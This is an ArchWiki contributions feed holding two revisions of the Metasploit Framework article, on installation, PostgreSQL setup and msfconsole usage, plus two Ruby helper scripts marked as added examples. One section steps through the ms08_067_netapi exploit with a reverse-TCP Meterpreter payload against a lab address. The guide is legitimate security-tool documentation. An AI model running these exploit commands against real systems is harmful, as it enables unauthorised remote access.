https://wiki.archlinux.org/api.php?action=feedcontributions&user=Blastitt&feedformat=atomArchWiki - User contributions [en]2024-03-29T12:32:10ZUser contributionsMediaWiki 1.41.0https://wiki.archlinux.org/index.php?title=Metasploit_Framework&diff=388333Metasploit Framework2015-07-27T03:51:23Z<p>Blastitt: Added section on setting up RVM in order to run msfconsole.</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Security]]<br />
{{Expansion|Meterpreter; More/better SQL search examples; More commands; Module development;}}<br />
<br />
From [http://www.offensive-security.com/metasploit-unleashed/Introduction the official site]:<br />
:''Consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins. The Metasploit Framework provides a truly impressive work environment. The MSF is far more than just a collection of exploits, it's an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel.''<br />
<br />
Currently, Metasploit requires PostgreSQL to be set up and configured on the system it runs on.<br />
This article shows how to get Metasploit working with a PostgreSQL database.<br />
<br />
== Installation ==<br />
<br />
Install {{AUR|metasploit}} from [[AUR]].<br />
<br />
For the latest development version, install {{AUR|metasploit-git}} instead.<br />
<br />
=== RVM ===<br />
<br />
{{ic|msfconsole}} requires [[Ruby]] and a number of [[Ruby#RubyGems|gems]] to run without error.<br />
<br />
Follow [[RVM#Installing_RVM]] and [[RVM#Using_RVM]] to install Ruby 2.1.5 and set it as the default version.<br />
<br />
Once complete, source the newly created RVM installation:<br />
<br />
$ source ~/.rvm/scripts/rvm<br />
<br />
and install all gems necessary to run {{ic|msfconsole}} using [[Ruby#Bundler]]:<br />
<br />
$ gem install bundler<br />
<br />
$ bundle install<br />
<br />
{{Note|Using a version of Ruby older than 2.1.5 will result in the failure to install the {{ic|metasploit-concern}} gem.}}<br />
<br />
== Setting up the database ==<br />
<br />
{{Note|Commands which must be run from {{ic|msfconsole}} will be prefixed with {{ic|msf >}} in this article.}}<br />
<br />
Metasploit can be used without a database, but cache operations like searching would be very slow. This section shows how to set up Metasploit with a ''PostgreSQL'' database server.<br />
<br />
Follow the [[PostgreSQL]] article and create a new database called {{ic|msf}}. Any database name can be used, but this article will use {{ic|msf}}.<br />
<br />
Start {{ic|msfconsole}} and type:<br />
<br />
msf > db_connect ''user''@msf<br />
<br />
where ''user'' is the database owner's name (usually your Linux user name).<br />
<br />
Rebuild the database cache:<br />
<br />
msf > db_rebuild_cache<br />
<br />
Metasploit will rebuild the cache in the background, and you can continue running commands meanwhile.<br />
<br />
{{Tip|It might take a few minutes to rebuild the cache the first time. Run {{ic|top}} or {{Pkg|htop}} to monitor the status of cache building. During the process, Ruby/Postgres/Metasploit processes will eat up 50% of CPU time.}}<br />
<br />
Currently Metasploit requires running the {{ic|db_connect}} command every time {{ic|msfconsole}} is started. To avoid typing that command every time, put this alias in your shell startup file, for example {{ic|~/.bashrc}}:<br />
<br />
alias msfconsole="msfconsole --quiet -x \"db_connect ${USER}@msf\""<br />
<br />
where the {{ic|--quiet}} option will [[#Disable the ASCII banner on startup|disable the ASCII banner on startup]], and {{ic|-x}} runs the given command right after startup.<br />
<br />
Another workaround is to create a {{ic|database.yml}} file in the {{ic|~/.msf4}} directory, where ''user'' and ''password'' are the credentials of the database owner. The file is read as plain YAML, not by a shell, so write the actual values rather than shell variables. For example:<br />
<br />
{{hc|~/.msf4/database.yml|<br />
production:<br />
  adapter: postgresql<br />
  database: msf<br />
  username: ''user''<br />
  password: ''password''<br />
  host: localhost<br />
  port: 5432<br />
  pool: 5<br />
  timeout: 5<br />
}}<br />
<br />
{{Note|The database cache needs to be built only once. On later startups, {{ic|msfconsole}} will say {{ic|[*] Rebuilding the module cache in the background...}}, but it will only update what has changed. If nothing changed, this takes only about half a second.}}<br />
<br />
Run {{ic|db_status}} to verify that the database connection is properly established:<br />
<br />
{{hc|msf > db_status|<br />
[*] postgresql connected to msf<br />
}}<br />
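Because {{ic|database.yml}} stores the database password, it is worth checking the file before pointing {{ic|msfconsole}} at it. The following Ruby script is an added example, not part of the wiki page or of Metasploit: it loads a {{ic|database.yml}} shaped like the one above, reports a missing {{ic|production}} section or missing keys, flags credentials that are still placeholders, and warns when the file is readable by other users. The required key list and the placeholder strings are assumptions taken from the example file in this article; the YAML samples are constructed.<br />
<br />
```ruby
require 'yaml'
require 'tmpdir'

# Added example (not from the wiki or from Metasploit): sanity-check a
# ~/.msf4/database.yml before pointing msfconsole at it.
# Assumption: the keys below mirror the example file in this article.
REQUIRED_KEYS = %w[adapter database username password host port].freeze
# Values that mean the template was copied without filling in real credentials.
PLACEHOLDER_VALUES = %w[${USER} ${PASS} user password].freeze

# Returns a list of findings (strings) for the file at +path+; empty means OK.
def check_database_yml(path, env = 'production')
  findings = []

  # The file stores a database password, so it must not be group/world readable.
  mode = File.stat(path).mode & 0o777
  if (mode & 0o077) != 0
    findings << format('file mode is %04o; it holds a password, use 0600', mode)
  end

  config  = YAML.safe_load(File.read(path))
  section = config.is_a?(Hash) ? config[env] : nil
  return findings << "no '#{env}' section" unless section.is_a?(Hash)

  missing = REQUIRED_KEYS - section.keys
  findings << "missing keys: #{missing.join(', ')}" unless missing.empty?

  unless section['adapter'] == 'postgresql'
    findings << "adapter is #{section['adapter'].inspect}, expected postgresql"
  end

  %w[username password].each do |key|
    value = section[key].to_s
    findings << "#{key} is a placeholder (#{value})" if PLACEHOLDER_VALUES.include?(value)
  end

  findings
end

# Helper for the demonstration: write constructed YAML to a temp dir with a given mode.
def write_sample(yaml_text, mode)
  path = File.join(Dir.mktmpdir('msf-dbcheck'), 'database.yml')
  File.write(path, yaml_text)
  File.chmod(mode, path)
  path
end

# Constructed sample: credentials filled in, correct permissions.
GOOD_SAMPLE = <<~YAML
  production:
    adapter: postgresql
    database: msf
    username: alice
    password: example-only-password
    host: localhost
    port: 5432
    pool: 5
    timeout: 5
YAML

# Constructed sample: placeholders left in, host missing, file world-readable.
BAD_SAMPLE = <<~YAML
  production:
    adapter: postgresql
    database: msf
    username: ${USER}
    password: ${PASS}
    port: 5432
YAML

if __FILE__ == $PROGRAM_NAME
  puts "good: #{check_database_yml(write_sample(GOOD_SAMPLE, 0o600)).inspect}"
  puts "bad:  #{check_database_yml(write_sample(BAD_SAMPLE, 0o644)).inspect}"
end
```
<br />
Run it against the real file with {{ic|check_database_yml(File.expand_path('~/.msf4/database.yml'))}}; an empty list means the file has the expected shape and permissions.<br />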
<br />
== Usage ==<br />
<br />
There are several interfaces available for Metasploit. This section will explain how to use {{ic|msfconsole}}, the interface that provides the most features available in MSF.<br />
<br />
To start it, simply type {{ic|msfconsole}}. The prompt will change to {{ic|msf >}} to indicate it's waiting for commands.<br />
<br />
{{Tip|Besides the Metasploit commands explained below, all the regular shell commands and scripts found in {{ic|$PATH}} are available too (except for aliases).}}<br />
<br />
=== Module types ===<br />
<br />
Everything (scripts, files, programs, etc.) in Metasploit is a module. There are six types of modules:<br />
<br />
* {{ic|auxiliary}} - Modules for helping the attacker in various tasks, like [[Nmap|port scanning]], version detection or network traffic analysis<br />
* {{ic|exploit}} - The code that takes advantage of a vulnerability and allows the execution of the payload, for example by triggering a buffer overflow or bypassing authentication<br />
* {{ic|payload}} - The code that runs right after a successful exploit, like establishing a remote connection, starting a Meterpreter session or executing some shell commands<br />
* {{ic|post}} - Various programs that can be run after successful exploitation and remote connection, like collecting passwords, setting up keyloggers or downloading files<br />
* {{ic|encoder}} - Programs for performing encryption<br />
* {{ic|nop}} - ''NOP'' generators. ''NOP'' is an assembly language instruction which simply does nothing. The machine code of this instruction is different on each hardware architecture. ''NOP'' instructions are useful for filling the void in executables.<br />
<br />
=== Searching for exploits ===<br />
<br />
{{Note|Currently the {{ic|search}} command [[#Bugs|does not work properly]]. Refer to [[#Searching from the database]] for a workaround.}}<br />
<br />
To discover what operating system and software version a target runs, perform a [[Nmap|port scan]]. With this information, use the {{ic|search}} command to search for available exploits.<br />
<br />
For example, to search for all Novell exploits for the Linux platform:<br />
<br />
msf > search platform:linux type:exploit name:Novell<br />
<br />
To search a specific field, type its name, followed by a colon and the phrase. The following search fields are available:<br />
<br />
{| class="wikitable"<br />
! style=white-space:nowrap | Search field<br />
! style=white-space:nowrap | Matches<br />
! style=white-space:nowrap | Possible values<br />
! style=white-space:nowrap | DB table & column<br />
|-<br />
| {{ic|app}}<br />
| style=white-space:nowrap | Passive (client) or Active (server) exploits<br />
| {{ic|client}}, {{ic|server}}<br />
| style=white-space:nowrap | {{ic|module_details.stance}}<br />
|-<br />
| {{ic|author}}<br />
| style=white-space:nowrap | Name and email of module Author<br />
| Any phrase<br />
| style=white-space:nowrap | {{ic|module_authors.name}}<br />
|-<br />
| {{ic|type}}<br />
| style=white-space:nowrap | The [[#Module types|module type]]<br />
| {{ic|auxiliary}}, {{ic|exploit}}, {{ic|payload}}, {{ic|post}}, {{ic|encoder}}, {{ic|nop}}<br />
| style=white-space:nowrap | {{ic|module_details.mtype}}<br />
|-<br />
| {{ic|name}}<br />
| style=white-space:nowrap | The path (Name) and the short description<br />
| Any phrase<br />
| {{ic|module_details.fullname}}, {{ic|module_details.name}}<br />
|-<br />
| {{ic|platform}}<br />
| style=white-space:nowrap | The target hardware or software platform<br />
| {{ic|bsdi}}, {{ic|netware}}, {{ic|linux}}, {{ic|hpux}}, {{ic|irix}}, {{ic|osx}}, {{ic|bsd}}, {{ic|platform}}, {{ic|java}}, {{ic|javascript}}, {{ic|unix}}, {{ic|php}}, {{ic|firefox}}, {{ic|nodejs}}, {{ic|ruby}}, {{ic|cisco}}, {{ic|android}}, {{ic|aix}}, {{ic|windows}}, {{ic|python}}, {{ic|solaris}}<br />
| style=white-space:nowrap | {{ic|module_platforms.name}}<br />
|-<br />
| {{ic|bid}}, {{ic|cve}}, {{ic|edb}}, {{ic|osvdb}} or {{ic|ref}}<br />
| The [http://www.securityfocus.com/ Bugtraq], [http://www.cvedetails.com/ CVE], [http://www.exploit-db.com/ Exploit-DB] or [http://www.osvdb.org/ OSVDB] ID, or any reference<br />
| Exploit database entry ID, or a part of upstream report URL<br />
| style=white-space:nowrap | {{ic|module_refs.name}}<br />
|-<br />
| (No field)<br />
| All of the above except {{ic|app}} and {{ic|type}}<br />
| Any phrase<br />
| All of the above<br />
|}<br />
<br />
See [[#Searching from the database]] and [[#Database search examples]] for more advanced search queries.<br />
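To make the {{ic|field:phrase}} syntax concrete, here is a small Ruby model of it, added here as an example; it is not Metasploit's own search implementation. It runs the queries from this section over a constructed module catalogue (module names, authors and references are made up), applies every term with AND semantics, and treats a term without a field as free text over all fields except {{ic|app}} and {{ic|type}}, as the table states. Case-insensitive matching is an assumption made for readability.<br />
<br />
```ruby
# Added example (not Metasploit's own code): a small model of the msfconsole
# search syntax described above, run over a constructed module catalogue.
# Every field:phrase term must match (AND), so "platform:linux type:exploit
# name:Novell" returns only Novell exploits for Linux.

# Constructed sample catalogue; names, authors and references are made up.
SAMPLE_MODULES = [
  { fullname: 'exploit/linux/misc/novell_example', name: 'Novell example service overflow',
    mtype: 'exploit', platforms: %w[linux], stance: 'aggressive',
    authors: ['alice <alice@example.invalid>'], refs: %w[EDB-EXAMPLE1] },
  { fullname: 'exploit/linux/ftp/example_bypass', name: 'Example FTP authentication bypass',
    mtype: 'exploit', platforms: %w[linux unix], stance: 'aggressive',
    authors: ['bob'], refs: [] },
  { fullname: 'auxiliary/scanner/misc/novell_example_version', name: 'Novell example version scanner',
    mtype: 'auxiliary', platforms: %w[linux unix], stance: 'aggressive',
    authors: ['bob'], refs: [] },
  { fullname: 'exploit/windows/browser/example_overflow', name: 'Example browser overflow',
    mtype: 'exploit', platforms: %w[windows], stance: 'passive',
    authors: ['carol'], refs: %w[OSVDB-EXAMPLE2] },
].freeze

# One matcher per search field from the table above (app maps client/server
# onto the stance column, as the table states).
FIELD_MATCHERS = {
  'app'      => ->(m, v) { m[:stance] == (v == 'client' ? 'passive' : 'aggressive') },
  'author'   => ->(m, v) { m[:authors].any? { |a| a.downcase.include?(v) } },
  'type'     => ->(m, v) { m[:mtype] == v },
  'name'     => ->(m, v) { [m[:fullname], m[:name]].any? { |s| s.downcase.include?(v) } },
  'platform' => ->(m, v) { m[:platforms].include?(v) },
  'ref'      => ->(m, v) { m[:refs].any? { |r| r.downcase.include?(v) } },
}
# bid/cve/edb/osvdb match a reference of that database, e.g. edb:example1 -> EDB-EXAMPLE1.
%w[bid cve edb osvdb].each do |db|
  FIELD_MATCHERS[db] = ->(m, v) { m[:refs].any? { |r| r.downcase == "#{db}-#{v}" } }
end
FIELD_MATCHERS.freeze

# A term without a field searches everything except app and type.
FREE_TEXT_FIELDS = %w[author name platform ref].freeze

# Turn "platform:linux type:exploit Novell" into
# [['platform', 'linux'], ['type', 'exploit'], [nil, 'novell']].
def parse_query(query)
  query.split.map do |token|
    field, phrase = token.split(':', 2)
    if phrase.nil?
      [nil, field.downcase]
    else
      raise ArgumentError, "unknown search field: #{field}" unless FIELD_MATCHERS.key?(field)
      [field, phrase.downcase]
    end
  end
end

def term_matches?(mod, field, phrase)
  if field
    FIELD_MATCHERS[field].call(mod, phrase)
  else
    FREE_TEXT_FIELDS.any? { |f| FIELD_MATCHERS[f].call(mod, phrase) }
  end
end

# Returns the fullnames of modules matching every term of +query+.
def search_modules(query, modules = SAMPLE_MODULES)
  terms = parse_query(query)
  modules.select { |m| terms.all? { |field, phrase| term_matches?(m, field, phrase) } }
         .map { |m| m[:fullname] }
end

if __FILE__ == $PROGRAM_NAME
  puts search_modules('platform:linux type:exploit name:Novell')
end
```
<br />
With the sample catalogue, {{ic|platform:linux type:exploit name:Novell}} returns only the Linux Novell exploit, while the free-text query {{ic|novell}} also returns the auxiliary scanner, because a bare term is matched against names, authors, platforms and references but not against the module type.<br />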
<br />
=== Using an exploit ===<br />
<br />
After choosing an appropriate exploit, it's time to start hacking!<br />
<br />
First, select an exploit using the {{ic|use}} command:<br />
<br />
msf > use exploit/windows/smb/ms08_067_netapi<br />
<br />
{{Note|{{ic|ms08_067_netapi}} is one of the most popular exploits affecting Windows XP and Windows Server 2003 SMB services. It was disclosed in 2008 and proves to be very reliable in exploiting unpatched systems which have firewalls disabled.}}<br />
<br />
To view information about a module, use the {{ic|info}} command:<br />
<br />
msf exploit(ms08_067_netapi) > info exploit/windows/smb/ms08_067_netapi<br />
<br />
Running {{ic|info}} without arguments shows information about the currently selected module.<br />
<br />
To view the selected exploit's options, run:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
...<br />
}}<br />
<br />
All the required fields must be provided before exploitation. Here, only the {{ic|RHOST}} variable must be specified. To assign a value to a variable use the {{ic|set}} command:<br />
<br />
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102<br />
<br />
Now choose the payload:<br />
<br />
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp<br />
<br />
{{Note|Meterpreter is a command shell built into Metasploit that allows the attacker to run remote commands on exploited systems. Reverse TCP is a technique where the exploited computer establishes a connection back to the computer it was exploited from.}}<br />
<br />
Choosing a payload (actually, choosing modules in general) will add more options. Run {{ic|show options}} again:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST 192.168.56.102 yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
<br />
Payload options (windows/meterpreter/reverse_tcp):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)<br />
LHOST yes The listen address<br />
LPORT 4444 yes The listen port<br />
}}<br />
<br />
Now assign the {{ic|LHOST}} variable the address of your computer, to which the exploited computer will connect back:<br />
<br />
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1<br />
<br />
Now launch the attack!<br />
<br />
msf exploit(ms08_067_netapi) > exploit<br />
<br />
If you are lucky, you will be dropped to a Meterpreter session where you can do anything on the remote computer. See [[#Meterpreter]] for available commands.<br />
<br />
== Bugs ==<br />
<br />
=== Search does not filter properly ===<br />
<br />
Currently the {{ic|search}} command in {{ic|msfconsole}} does not properly filter the results if more than one filter is specified. See [https://dev.metasploit.com/redmine/issues/8822 the bug report] for details.<br />
<br />
See [[#Searching from the database]] for a workaround.<br />
<br />
== Tips and tricks ==<br />
<br />
=== Searching from the database ===<br />
<br />
Since everything in Metasploit is stored in a database, it's easy to make powerful search queries without the need for the {{ic|search}} frontend command.<br />
<br />
To start the database interface, run:<br />
<br />
$ psql msf<br />
<br />
The information about modules is stored in 8 tables:<br />
<br />
{| class="wikitable"<br />
!Table Name<br />
!Contents<br />
|-<br />
|{{ic|module_details}}<br />
|The "main" table, describes various details of each module<br />
|-<br />
|{{ic|module_actions}}<br />
|The action names of ''auxiliary'' modules<br />
|-<br />
|{{ic|module_archs}}<br />
|The target hardware architecture or software platform<br />
|-<br />
|{{ic|module_authors}}<br />
|Names and emails of module author<br />
|-<br />
|{{ic|module_mixins}}<br />
|Empty (???)<br />
|-<br />
|{{ic|module_platforms}}<br />
|The target operating system. See also [[#Popularity of a platform by number of exploits]]<br />
|-<br />
|{{ic|module_refs}}<br />
|References to various online exploit databases and reports <br />
|-<br />
|{{ic|module_targets}}<br />
|The target program name and version of the ''exploit''<br />
|}<br />
<br />
{{Tip|To see what type of details (columns) a table contains, run {{ic|\d+ ''table_name''}}. For example: {{ic|\d+ module_details}}.}}<br />
<br />
Almost all tables have three columns: {{ic|id}}, {{ic|detail_id}} and {{ic|name}}, except for the {{ic|module_details}} table, which has 16 columns.<br />
<br />
The {{ic|detail_id}} values are pointers to rows of the {{ic|module_details}} table.<br />
<br />
To see all the contents of a table, run:<br />
<br />
SELECT * FROM ''table_name'';<br />
<br />
Three attributes can have multiple values per module, so each is stored in its own table, one row per value:<br />
<br />
* Architecture ({{ic|module_archs}})<br />
* Platform ({{ic|module_platforms}})<br />
* Target ({{ic|module_targets}})<br />
<br />
The remaining, single-valued attributes are columns of {{ic|module_details}}:<br />
<br />
* module type<br />
* stance<br />
* privileged<br />
* path<br />
* name<br />
* refname<br />
* rank<br />
* disclosure date<br />
<br />
=== Database search examples ===<br />
<br />
The {{ic|module_details}} table contains multiple columns and viewing them all at once is not convenient. To show only basic information about the modules:<br />
<br />
SELECT id, mtype, refname, disclosure_date, rank, stance, name<br />
FROM module_details;<br />
<br />
Show some information about available modules, including platform information from {{ic|module_platforms}}:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id;<br />
<br />
Show all client (aggressive) exploits for Windows platform:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive';<br />
<br />
Show all exploits for Windows platform with rank >= 500 disclosed after 2013:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND rank >= 500<br />
AND disclosure_date >= TIMESTAMP '2013-1-1';<br />
<br />
Show all aggressive (client) exploits for Windows platform with rank >= 500 and include additional information about module's target:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, module_details.name, DATE(disclosure_date), rank, module_targets.name as target<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id JOIN module_targets ON module_details.id = module_targets.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive'<br />
AND rank >= 500<br />
ORDER BY target;<br />
<br />
=== Popularity of a platform by number of exploits ===<br />
<br />
To view the possible {{ic|platform}} values, and number of available exploits, run from {{ic|psql}}:<br />
<br />
SELECT name, count(*)<br />
FROM module_platforms<br />
GROUP BY name<br />
ORDER BY count DESC;<br />
<br />
=== Disable the ASCII banner on startup ===<br />
<br />
To disable the banner, run {{ic|msfconsole}} with {{ic|-q}}/{{ic|--quiet}} argument:<br />
<br />
$ msfconsole --quiet<br />
<br />
=== Preserve variable values between sessions ===<br />
<br />
If you do not want the variables to reset when selecting another module or when rerunning {{ic|msfconsole}}, set them globally via {{ic|setg}}, for example:<br />
<br />
msf > setg RHOST 192.168.56.102<br />
<br />
== Troubleshooting ==<br />
<br />
=== Cannot click in VNC viewer ===<br />
<br />
If you selected a VNC viewer payload but are unable to click or do any actions, you forgot to set the {{ic|ViewOnly}} variable to false. To fix this, re-run the exploit with the variable set to {{ic|false}}:<br />
<br />
msf > set ViewOnly false<br />
<br />
=== cannot load such file -- robots (LoadError) ===<br />
<br />
If you get an error like this:<br />
<br />
~/metasploit-framework/lib/metasploit/framework.rb:19:in `require': cannot load such file -- robots (LoadError)<br />
from ~/metasploit-framework/lib/metasploit/framework.rb:19:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `const_get'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `block in constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `each'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/core_ext/string/inflections.rb:54:in `constantize'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'<br />
from ./msfconsole:48:in `<main>'<br />
<br />
This happens because the file {{ic|robots.rb}} has incorrect permissions and can be read only by the root user (see [https://github.com/fizx/robots/issues/6 the bug report]):<br />
<br />
{{hc|$ ls -l /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib|<br />
total 4<br />
-rw-r----- 1 root root 3174 Oct 19 16:47 robots.rb<br />
}}<br />
<br />
To fix this, simply change the permission to be world-readable:<br />
<br />
# chmod o+r /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib/robots.rb<br />
<br />
=== db_connect fails silently ===<br />
<br />
If {{ic|db_connect}} prints no output, but you later get a message like this:<br />
<br />
[!] Database not connected or cache not built, using slow search<br />
<br />
that probably means that the {{ic|postgresql}} service is not running.<br />
<br />
== See also ==<br />
<br />
* [http://www.offensive-security.com/metasploit-unleashed/Main_Page Metasploit Unleashed security training]<br />
* [https://github.com/rapid7/metasploit-framework/wiki Metasploit wiki on GitHub]<br />
* [http://en.wikibooks.org/wiki/Metasploit The Metasploit Book]</div>Blastitthttps://wiki.archlinux.org/index.php?title=User:Blastitt&diff=388330User:Blastitt2015-07-27T03:07:53Z<p>Blastitt: Created page with "You can probably find me on the #archlinux IRC channel."</p>
<hr />
<div>You can probably find me on the #archlinux [[IRC channel]].</div>Blastitthttps://wiki.archlinux.org/index.php?title=Metasploit_Framework&diff=388329Metasploit Framework2015-07-27T02:58:41Z<p>Blastitt: Added creation of database.yml file: Alternative to manually connecting to database on msfconsole start.</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Security]]<br />
{{Expansion|Meterpreter; More/better SQL search examples; More commands; Module development;}}<br />
<br />
From [http://www.offensive-security.com/metasploit-unleashed/Introduction the official site]:<br />
:''Consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins. The Metasploit Framework provides a truly impressive work environment. The MSF is far more than just a collection of exploits, it's an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel.''<br />
<br />
Currently, Metasploit requires to setup and configure Postgresql on target system to work.<br />
This wiki will show how to get metasploit working with a Postgresql database.<br />
<br />
== Installation ==<br />
<br />
Install {{AUR|metasploit}} from [[AUR]].<br />
<br />
For latest development version, install {{AUR|metasploit-git}} instead.<br />
<br />
== Setting up the database ==<br />
<br />
{{Note|Commands which must be run from {{ic|msfconsole}} will be prefixed with {{ic|msf >}} in this article.}}<br />
<br />
Metasploit can be used without a database, but cache operations like searching would be very slow. This section shows how to set up Metasploit with ''Postgresql'' database server.<br />
<br />
Follow the [[PostgreSQL]] article and create a new database called {{ic|msf}}. Any database name can be used, but this article will follow {{ic|msf}}.<br />
<br />
Start {{ic|msfconsole}} and type:<br />
<br />
msf > db_connect ''user''@msf<br />
<br />
where ''user'' is the database owner's name (usually your linux user's name).<br />
<br />
Rebuild the database cache:<br />
<br />
msf > db_rebuild_cache<br />
<br />
Metasploit will rebuild the cache in the background, and you can continue running commands meanwhile.<br />
<br />
{{Tip|It might take a few minutes to rebuild the cache the first time. Run {{ic|top}} or {{Pkg|htop}} to monitor the status of cache building. During the process, Ruby/Postgres/Metasploit processes will eat up 50% of CPU time.}}<br />
<br />
Currently Metasploit requires running the {{ic|db_connect}} command every time {{ic|msfconsole}} is started. To avoid typing that command every time, simply put this alias in your shell startup file, for example {{ic|~/.bashrc}}:<br />
<br />
alias msfconsole="msfconsole --quiet -x \"db_connect ${USER}@msf\""<br />
<br />
where the {{ic|quiet}} option will [[#Disable the ASCII banner on startup]], and the {{ic|-x}} command runs the given command right after startup.<br />
<br />
Another workaround for this is to create a {{ic|database.yml}} file in the {{ic|.msf4}} directory. For example:<br />
<br />
{{hc|~/.msf4/database.yml|<br />
production:<br />
adapter: postgresql<br />
database: msf<br />
username: ${USER}<br />
password: ${PASS}<br />
host: localhost<br />
port: 5432<br />
pool: 5<br />
timeout: 5<br />
}}<br />
<br />
<br />
{{Note|The database cache needs to be built only once. Later on upon startup, {{ic|msfconsole}} will say {{ic|[*] Rebuilding the module cache in the background...}}, but it will actually only update the changes. If no changes are made to the database, it will take only half a second.}}<br />
<br />
Run {{ic|db_status}} to verify that database connection is properly established:<br />
<br />
{{hc|msf > db_status|<br />
[*] postgresql connected to msf<br />
}}<br />
<br />
== Usage ==<br />
<br />
There are several interfaces available for Metasploit. This section will explain how to use {{ic|msfconsole}}, the interface that provides the most features available in MSF.<br />
<br />
To start it, simply type {{ic|msfconsole}}. The prompt will change to {{ic|msf >}} to indicate it's waiting for commands.<br />
<br />
{{Tip|Besides additional Metasploit commands explained below, all the regular shell commands and scripts found in {{ic|$PATH}} are available too! (except for aliases)}}<br />
<br />
=== Module types ===<br />
<br />
Everything (scripts, files, programs etc) in Metasploit is a module. There are 6 types of modules:<br />
<br />
* {{ic|auxiliary}} - Modules for helping the attacker in various tasks, like [[Nmap|port scanning]], version detection or network traffic analysis<br />
* {{ic|exploit}} - The code that takes advantage of a vulnerability and allows the execution of the payload, like triggering buffer overflow or bypassing authentication<br />
* {{ic|payload}} - The thing that has to be done right after a successful exploit, like establishing a remote connection, starting a meterpreter session or executing some shell commands<br />
* {{ic|post}} - Various programs that can be run after successful exploitation and remote connection, like collecting passwords, setting up keyloggers or downloading files<br />
* {{ic|encoder}} - Programs for performing encryption<br />
* {{ic|nop}} - ''NOP'' generators. ''NOP'' is an assembly language instruction which simply does nothing. The machine code of this instruction is different on each hardware architecture. ''NOP'' instructions are useful for filling the void in executables.<br />
<br />
=== Searching for exploits ===<br />
<br />
{{Note|Currently the {{ic|search}} command [[#Bugs|does not work properly]]. Refer to [[#Searching from the database]] for a workaround.}}<br />
<br />
To discover what operating system and software version a target runs, perform a [[Nmap|port scan]]. With this information, use the {{ic|search}} command to search for available exploits.<br />
<br />
For example, to search for all exploits on Linux platform of Novell:<br />
<br />
msf > search platform:linux type:exploit name:Novell<br />
<br />
To search for specific field, type it's name, followed by column and the phrase. The following search fields are available:<br />
<br />
{| class="wikitable"<br />
! style=white-space:nowrap | Search field<br />
! style=white-space:nowrap | Matches<br />
! style=white-space:nowrap | Possible values<br />
! style=white-space:nowrap | DB table & column<br />
|-<br />
| {{ic|app}}<br />
| style=white-space:nowrap | Passive (client) or Active (server) exploits<br />
| {{ic|client}}, {{ic|server}}<br />
| style=white-space:nowrap | {{ic|module_details.stance}}<br />
|-<br />
| {{ic|author}}<br />
| style=white-space:nowrap | Name and email of module Author<br />
| Any phrase<br />
| style=white-space:nowrap | {{ic|module_authors.name}}<br />
|-<br />
| {{ic|type}}<br />
| style=white-space:nowrap | The [[#Module types|module type]]<br />
